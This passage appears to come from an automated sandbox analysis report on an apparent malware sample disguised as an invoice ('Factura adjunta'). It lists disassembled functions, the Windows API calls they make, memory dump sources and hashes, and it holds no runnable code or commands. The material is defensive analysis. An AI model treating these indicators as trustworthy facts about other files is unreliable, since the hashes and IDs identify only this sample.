                            • Instruction Fuzzy Hash: 3F912871D00229EBDB10DFA4DC85ADEBBB9FF48710F20416AF519A7281EB755A44CFA0
                            Function 0080B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                            Download Yara Rule
                            APIs
                            • OleSetContainedObject.OLE32(?,00000001), ref: 0080B981
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ContainedObject
                            • String ID: AutoIt3GUI$Container
                            • API String ID: 3565006973-3941886329
                            • Opcode ID: 74845b162c1191a11c416c95a0502b5076c6c2411ca967794e10ca3cf4de96c6
                            • Instruction ID: c8c59328ea2e14e2e47800a0b9b36a94eb5e8290ab0631d2425a95e2d83b8d5e
                            • Opcode Fuzzy Hash: 74845b162c1191a11c416c95a0502b5076c6c2411ca967794e10ca3cf4de96c6
                            • Instruction Fuzzy Hash: 5C912A706006059FDB64DF68C884B66BBE9FF48710F24856EF94ACB7A1EB70E845CB50
                            Function 0081B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007CFEC6: _wcscpy.LIBCMT ref: 007CFEE9
                              • Part of subcall function 007B9997: __itow.LIBCMT ref: 007B99C2
                              • Part of subcall function 007B9997: __swprintf.LIBCMT ref: 007B9A0C
                            • __wcsnicmp.LIBCMT ref: 0081B298
                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0081B361
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                            • String ID: LPT
                            • API String ID: 3222508074-1350329615
                            • Opcode ID: 04d016edcc2fa42208188f415d1462fb6adb9268d967916fd48dd11df3c7c7a4
                            • Instruction ID: 79ae560bd42947ccaff0c0cf2faa2469682e732c37ba2e8514d0c55f7521cc94
                            • Opcode Fuzzy Hash: 04d016edcc2fa42208188f415d1462fb6adb9268d967916fd48dd11df3c7c7a4
                            • Instruction Fuzzy Hash: B6612A75A00219EFCB14EB94C885EEEB7B8FF48310F11406AF556EB391DB74AE848B51
                            Function 007F8A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: Oa|
                            • API String ID: 4104443479-2714924062
                            • Opcode ID: 51d241add54489cc3ccb7d5304cca29f71f2cfd22a5f76087b3ad72b97036deb
                            • Instruction ID: 42f32c7c026b2d9c6ab0e5d205804cbfb4256b1b2c9c1c12fcaac072a2e0a5d2
                            • Opcode Fuzzy Hash: 51d241add54489cc3ccb7d5304cca29f71f2cfd22a5f76087b3ad72b97036deb
                            • Instruction Fuzzy Hash: 9F514DB4900609DFCB64CFA8C484ABEB7B1FF44304F14852AE95AD7350EB35A995CB51
                            Function 007C2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 007C2AC8
                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 007C2AE1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            • API String ID: 2783356886-2766056989
                            • Opcode ID: ec70d41c5186e9ff6b60b22c71a117dde58305849a3dfaf2b04f185a7c2fe55e
                            • Instruction ID: 687dfb4957f43756ed86fcd06f19108f496d92193635b2251df1d8e5fe535a87
                            • Opcode Fuzzy Hash: ec70d41c5186e9ff6b60b22c71a117dde58305849a3dfaf2b04f185a7c2fe55e
                            • Instruction Fuzzy Hash: 84516671418745EBD320AF10D88ABAFBBF8FF85314F42884CF2E9511A1DB348469CB26
                            Function 008199BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B506B: __fread_nolock.LIBCMT ref: 007B5089
                            • _wcscmp.LIBCMT ref: 00819AAE
                            • _wcscmp.LIBCMT ref: 00819AC1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _wcscmp$__fread_nolock
                            • String ID: FILE
                            • API String ID: 4029003684-3121273764
                            • Opcode ID: 0491795176f4aa7b5070a3351ab76fa59102228c39bbd7567f5968332f0c2da5
                            • Instruction ID: 49995c7f5c921cb564ab62880bf18e07ac63b7793d097be9747ca9ff8f8bb1ca
                            • Opcode Fuzzy Hash: 0491795176f4aa7b5070a3351ab76fa59102228c39bbd7567f5968332f0c2da5
                            • Instruction Fuzzy Hash: F341DA71A00619BADF20AAE4DC85FEFB7BDEF45710F00007AF944F7281D675AA4487A1
                            Function 00822882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00822892
                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008228C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CrackInternet_memset
                            • String ID: |
                            • API String ID: 1413715105-2343686810
                            • Opcode ID: fa3eae97cee2e51245caeb4dec06cb5e79cbf71e2734d87e91d79e42f696b428
                            • Instruction ID: e002329bbb847442be41695899a6d842f163a1d38019a5302b65e05d1e7d6d0c
                            • Opcode Fuzzy Hash: fa3eae97cee2e51245caeb4dec06cb5e79cbf71e2734d87e91d79e42f696b428
                            • Instruction Fuzzy Hash: 9C311971800119EFCF15AFA1DC89EEEBFB9FF08300F104029F815A6266DA355A56DBA0
                            Function 00836CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32(?,?,?,?), ref: 00836D86
                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00836DC2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$DestroyMove
                            • String ID: static
                            • API String ID: 2139405536-2160076837
                            • Opcode ID: 5897666efe1094e763add9685457d3cfb35607482f2ba22a6191a89c5e865dd5
                            • Instruction ID: 246223235dbe2558f833afc1d23092ba7f4bce9f00868d423a5235e5979e0bac
                            • Opcode Fuzzy Hash: 5897666efe1094e763add9685457d3cfb35607482f2ba22a6191a89c5e865dd5
                            • Instruction Fuzzy Hash: 00318171200604AEDB109F68CC44BFB77B9FF89764F108619F9A5D7191DB35AC91CBA0
                            Function 00812D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00812E00
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00812E3B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: e1720d74fe930d9e461fcc003f44169550ae67b10ffe81f98a6809964090f0ed
                            • Instruction ID: 6dae8e00689610fd415529273cd7a8337e2e18a5ec007c2f4e3887b5c057479f
                            • Opcode Fuzzy Hash: e1720d74fe930d9e461fcc003f44169550ae67b10ffe81f98a6809964090f0ed
                            • Instruction Fuzzy Hash: 6731D571A00309EBEB248F98D845BEEBBBDFF05350F14442AE985D61A2E77099D4CB51
                            Function 00836943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008369D0
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008369DB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            • API String ID: 3850602802-2096851135
                            • Opcode ID: 808bde694a3fe1e30b192ea29438f1e754b4fe94b646f771c977771a88071ba6
                            • Instruction ID: c6fce49c1d687543ca46a814b86b8ff7a82db05e3ff84e526c25e20821b75b10
                            • Opcode Fuzzy Hash: 808bde694a3fe1e30b192ea29438f1e754b4fe94b646f771c977771a88071ba6
                            • Instruction Fuzzy Hash: 671193716002087FEF119E18CC90FAB3B6AFBD93A4F118124FD58DB291E6759C6187E0
                            Function 00839962 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID: h)
                            • API String ID: 0-3328819710
                            • Opcode ID: 6bae578a20fce6ab37560ba50554e8191b6f4c79e42c619745dcd50543ef3458
                            • Instruction ID: 368be66f9cf6171b597d9013f037e5aedf565e94fc3999263497c7c893b3fbad
                            • Opcode Fuzzy Hash: 6bae578a20fce6ab37560ba50554e8191b6f4c79e42c619745dcd50543ef3458
                            • Instruction Fuzzy Hash: 6F21AF31204128BFEB119F58CC45FBA37A4FB49354F004659FA96EA1E1E6B0DD10DBA0
                            Function 00836E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007B1D73
                              • Part of subcall function 007B1D35: GetStockObject.GDI32(00000011), ref: 007B1D87
                              • Part of subcall function 007B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007B1D91
                            • GetWindowRect.USER32(00000000,?), ref: 00836EE0
                            • GetSysColor.USER32(00000012), ref: 00836EFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                            • String ID: static
                            • API String ID: 1983116058-2160076837
                            • Opcode ID: 5419ca540b1d2a7fe5451c369c8ca8bd23b2f2a001c40b88863584dac65008d3
                            • Instruction ID: 34b5f5eb32f3726e5ff1a8de4a83936b5e8bd46a36086e392a60b78f19705df1
                            • Opcode Fuzzy Hash: 5419ca540b1d2a7fe5451c369c8ca8bd23b2f2a001c40b88863584dac65008d3
                            • Instruction Fuzzy Hash: D2215C72A10209AFDB04DFA8DD45AFA7BB8FB48354F004A28FD55D3250E634E8619B90
                            Function 008369FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CreateMenuPopup
                            • String ID: h)
                            • API String ID: 3826294624-3328819710
                            • Opcode ID: fec71ee2f5397a4dd3372487b3a153dbfb33e4dbbf61e5485a0700edcee9efea
                            • Instruction ID: 4db9725191d8bf3b3edc9503876a65a181c1b35d46412d4ea5a47a0ed813a315
                            • Opcode Fuzzy Hash: fec71ee2f5397a4dd3372487b3a153dbfb33e4dbbf61e5485a0700edcee9efea
                            • Instruction Fuzzy Hash: 4B215A74500619EFCB10CF28C448B9677F1FB89320F18C569E89AAB351E731AC66CF91
                            Function 00836B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextLengthW.USER32(00000000), ref: 00836C11
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00836C20
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            • API String ID: 2978978980-2167791130
                            • Opcode ID: 4b020ef21bee7b4338d359226b8b7e6552e7f5c77d0c7d56fa08b414da87d8c1
                            • Instruction ID: 8e4bfc7278866610384f757720bb8eb001750e8e10bc2775c67789acafcc883d
                            • Opcode Fuzzy Hash: 4b020ef21bee7b4338d359226b8b7e6552e7f5c77d0c7d56fa08b414da87d8c1
                            • Instruction Fuzzy Hash: C0119071500108BBEF104E68DC45AEA7769FB94378F608724F964D31D0E675DCA19BA0
                            Function 00812E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00812F11
                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00812F30
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: e2091fd279365c8374fc8df22f9da116eefb21b517048f8f6780e106077956be
                            • Instruction ID: b608ad1284c22f86b2e1efdb8330c81f27a8b1735be023fee798132f90e0d26b
                            • Opcode Fuzzy Hash: e2091fd279365c8374fc8df22f9da116eefb21b517048f8f6780e106077956be
                            • Instruction Fuzzy Hash: 3A11BE35901268ABCB20DB58DC04BD9B7BDFF01314F0440A1E854F72A1EBB0EEA58791
                            Function 008224CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00822520
                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00822549
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Internet$OpenOption
                            • String ID: <local>
                            • API String ID: 942729171-4266983199
                            • Opcode ID: 3f08fe3015af8ee5daff46c24e771a26e8461dd54e3c3f7c90ccef4efd9b63c4
                            • Instruction ID: 17e9926810b9c20eee739fdbe297187f7614b9dd4ddb12f7418c757b0e97aecb
                            • Opcode Fuzzy Hash: 3f08fe3015af8ee5daff46c24e771a26e8461dd54e3c3f7c90ccef4efd9b63c4
                            • Instruction Fuzzy Hash: 80110270500235BADB249F51EC99EBBFFA8FF06355F10812AF905C2040D67069D0DAF0
                            Function 00838752 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,?,?,?), ref: 0083879F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: h)
                            • API String ID: 3850602802-3328819710
                            • Opcode ID: f53a6b5d846e558cec28220ac3ca2ad85010ea0e9236790d3efceacbc05067d5
                            • Instruction ID: 51bf43347b43a584c7e202c1261d99967f2682585b9a18e4c2ec67794a0f97a2
                            • Opcode Fuzzy Hash: f53a6b5d846e558cec28220ac3ca2ad85010ea0e9236790d3efceacbc05067d5
